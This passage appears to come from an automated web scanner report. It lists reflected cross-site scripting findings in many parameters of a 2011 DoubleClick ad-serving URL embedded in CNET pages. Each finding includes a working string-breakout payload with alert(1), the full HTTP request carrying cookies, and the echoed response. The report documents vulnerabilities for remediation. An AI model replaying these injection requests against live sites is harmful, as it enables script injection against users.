//ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn4dbe8"-alert(1)-"7ccee170db7&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWA
...[SNIP]...

3.200. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97c91"-alert(1)-"12af05d6124 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US97c91"-alert(1)-"12af05d6124&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US97c91"-alert(1)-"12af05d6124&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAA
...[SNIP]...

3.201. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e70"-alert(1)-"5f8ba91465f was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=176e70"-alert(1)-"5f8ba91465f&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=176e70"-alert(1)-"5f8ba91465f&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.1
...[SNIP]...

3.202. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5e94"-alert(1)-"672982ddc8e was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253af5e94"-alert(1)-"672982ddc8e&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253af5e94"-alert(1)-"672982ddc8e&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=m
...[SNIP]...

3.203. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c8d5"-alert(1)-"1adcf2285e9 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=9c8d5"-alert(1)-"1adcf2285e9&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
9853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=9c8d5"-alert(1)-"1adcf2285e9&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.htm
...[SNIP]...

3.204. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eaae"-alert(1)-"b85f9dd3226 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com2eaae"-alert(1)-"b85f9dd3226&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com2eaae"-alert(1)-"b85f9dd3226&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-product
...[SNIP]...

3.205. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd82a"-alert(1)-"527f20e513 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2cd82a"-alert(1)-"527f20e513&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3af6/17/152/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2cd82a"-alert(1)-"527f20e513&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJ
...[SNIP]...

3.206. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6142"-alert(1)-"256dabadf78 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.comf6142"-alert(1)-"256dabadf78&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.comf6142"-alert(1)-"256dabadf78&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm
...[SNIP]...

3.207. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e15d"-alert(1)-"86cedb662e5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@6e15d"-alert(1)-"86cedb662e5&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
ite=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@6e15d"-alert(1)-"86cedb662e5&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852066");
var wmode = "opaque";
...[SNIP]...

3.208. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 904b8"-alert(1)-"9c8a7d52c2b was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=904b8"-alert(1)-"9c8a7d52c2b&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=904b8"-alert(1)-"9c8a7d52c2b&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&
...[SNIP]...

3.209. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 801e3"-alert(1)-"324ce86438a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100801e3"-alert(1)-"324ce86438a&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
